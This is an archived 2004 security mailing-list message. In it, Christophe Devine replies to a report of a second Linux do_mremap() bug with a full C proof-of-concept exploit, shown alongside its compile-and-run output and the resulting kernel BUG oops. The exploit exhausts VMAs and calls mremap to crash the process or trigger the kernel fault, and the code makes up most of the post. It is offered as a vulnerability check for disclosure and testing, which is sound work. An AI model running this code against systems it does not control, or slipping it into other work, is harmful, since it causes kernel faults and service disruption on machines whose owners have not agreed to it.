lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <20040218135137.GA224@cr0.net>
From: devine at iie.cnam.fr (Christophe Devine)
Subject: Re: Second critical mremap() bug found in all Linux kernels

Paul Starzetz wrote:

> The kernel also tries to insert the overlapping VMA area into the VMA
> descriptor list but this fails due to further checks in the low level
> VMA manipulation code. The low level VMA list check in the 2.4 and 2.6
> kernel versions just call BUG() therefore terminating the malicious
> process.

This PoC exploit can be used to check if a Linux system is vulnerable
to the second do_mremap() bug; the code has only been tested on Linux
version 2.4.22 so far.


$ gcc -W -Wall mremap_poc_2.c && ./a.out
mmap: Cannot allocate memory
created ~65530 VMAs
now mremapping 0x3FFE5000 at 0x3FFE1000
Segmentation fault


$ dmesg | tail -n 16
kernel BUG at mmap.c:1194!
invalid operand: 0000
CPU:    0
EIP:    0010:[<c01239b5>]    Not tainted
EFLAGS: 00010287
eax: 3ffe2000   ebx: ce189f80   ecx: ce189f38   edx: ce189f20
esi: ce189fc4   edi: ce189f04   ebp: ce189ec0   esp: cf101f44
ds: 0018   es: 0018   ss: 0018
Process a.out (pid: 5371, stackpage=cf101000)
Stack: ce189f80 ce189fc4 ce189f04 3ffe1000 3ffe1000 c012873f cf1b66e0 c01287c7
       cf1b66e0 ce189ec0 cf100000 00001000 cf1b66fc ffff0001 cf1b66e0 00000000
       c339df1c ce189ec0 cf100000 fffffff4 ce189e60 c0128896 3ffe5000 00001000
Call Trace:    [<c012873f>] [<c01287c7>] [<c0128896>] [<c01086b3>]

Code: 0f 0b aa 04 21 f9 2d c0 8b 7c 24 10 8b 74 24 14 8b 5c 24 18


$ cat mremap_poc_2.c

/*
 *  Proof-of-concept exploit code for do_mremap() #2
 *
 *  Copyright (C) 2004  Christophe Devine
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 */

#include <asm/unistd.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
#include <errno.h>

#define MREMAP_MAYMOVE  1
#define MREMAP_FIXED    2

#define MREMAP_FLAGS  MREMAP_MAYMOVE | MREMAP_FIXED

#define __NR_real_mremap __NR_mremap

static inline _syscall5( void *, real_mremap, void *, old_address,
                         size_t, old_size, size_t, new_size,
                         unsigned long, flags, void *, new_address );

#define VMA_SIZE 0x00003000

int main( void )
{
    int i, ret;
    void *base0;
    void *base1;

    i = 0;

    while( 1 )
    {
        i++;

        ret = (int) mmap( (void *)( i * (VMA_SIZE + 0x1000) ),
                          VMA_SIZE, PROT_READ | PROT_WRITE,
                          MAP_PRIVATE | MAP_ANONYMOUS, 0, 0 );

        if( ret == -1 )
        {
            perror( "mmap" );
            break;
        }

        base0 = base1;
        base1 = (void *) ret;
    }

    printf( "created ~%d VMAs\n", i );

    base0 += 0x1000;
    base1 += 0x1000;

    printf( "now mremapping 0x%08X at 0x%08X\n",
            (int) base1, (int) base0 );

    real_mremap( base1, 4096, 4096, MREMAP_FLAGS, base0 );

    printf( "kernel may not be vulnerable\n" );

    return( 0 );
}

EOF

-- 
Christophe Devine - http://www.cr0.net:8040/about/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ